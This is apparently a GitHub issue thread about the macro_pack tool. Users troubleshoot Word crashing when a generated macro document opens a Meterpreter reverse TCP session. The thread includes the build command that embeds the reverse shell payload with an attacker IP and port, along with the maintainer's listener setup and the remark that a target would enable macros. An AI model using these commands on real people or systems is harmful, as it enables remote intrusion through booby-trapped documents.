### ISSUE TITLE
Issues building a working test.docm

### ISSUE THREAD

**Issue by Flutebuddie** [sevagas/macro_pack#54]
I'm attempting to use macro_pack_1.9.1 to build a reverse TCP into a Word document.  For the build, I use:

C:\>echo 192.168.153.128 8443 | macro_pack.exe -t METERPRETER -o -G test.docm

The build completes successfully so I start up my Meterpreter listener in Kali on the above given IP and port. Then I attempt to test with:
C:\>macro_pack.exe --run "<location>\test.docm

The Word document opens successfully and I see a Meterpreter session open on my Kali machine (see attached image Snip1), however Word encounters and error and force closes which terminates the session (see attached image Snip2).  In the command window that I used to launch the test, I see a traceback error (see attached image Snip3).

File "build_tmp\modules\com_run.py", line 74, in run
File "<COMObject <unknown>>", line 5, in Open
pywintypes.com_error: (-2147023170, 'The remote procedure call failed.', None, None)

![Snip 1](https://user-images.githubusercontent.com/12616083/82491964-6f93c480-9ab3-11ea-9361-8eca44a054b3.png)
![Snip 2](https://user-images.githubusercontent.com/12616083/82491972-728eb500-9ab3-11ea-92ad-b1fb16af4b13.png)
![Snip 3](https://user-images.githubusercontent.com/12616083/82491977-76bad280-9ab3-11ea-8e7f-33c3e0087d0e.png)

**Comment by sevagas** [comment]
Hi,
Have you try just running the document by double clicking on it instead of using macro_pack --run ?
When you use --run, the com object is destroyed after less then 2 sec which is probably why the connection is shut. 
Note the the --run option is mainly interesting for tests, in real life, the target would open the file and click on enable macro.

**Comment by Flutebuddie** [comment]
Yes, when opening the generated file, I get the same result as when I used the --run option.  Word crashes.  Out of curiosity, I also attempted to generate .docx, .xlsx, and .xlsm files as well and also got the same result with the application crashing.  And then I contacted another tester I know to try it...he went through the same install, build and run steps as I followed on the man page and also received the same results.  I am running a properly activated copy of Microsoft Office 365 ProPlus.

**Comment by sevagas** [comment]
Hi, I just tried, no problem on my side. With same command line, and windows defender is running.
I still get the remote access and can interract with session.

Have you configured the metasploit listener, this configuration can be tricky ?
Normally a file called meterpreter.rc is created when you generate this payload. It give you an example on how to configure the listener. You can directly start a listener by calling "msfconsole -r meterpreter.rc"

Please try and tell me if it resolves your problem

**Comment by sevagas** [comment]
@Flutebuddie  have you got the time to test with meterpreter.rc configuration?

**Comment by enoir3** [comment]
Sorry for the delay.  Yes, I both manually configured my listener and started the listener using the generated RC file, and neither prevent the document from crashing and terminating the session.  Here is the MSF output.  The other errors are the same.
![image](https://user-images.githubusercontent.com/65781895/82737024-dd323180-9cfb-11ea-98ad-e12403786143.png)

**Comment by danielyc** [comment]
Hi, i'm encountering the same issue. same error message when running though macro_pack and crashes with normal execution as well.

**Comment by sevagas** [comment]
It may be a problem with Office 365 indeed. I will try that and let you know
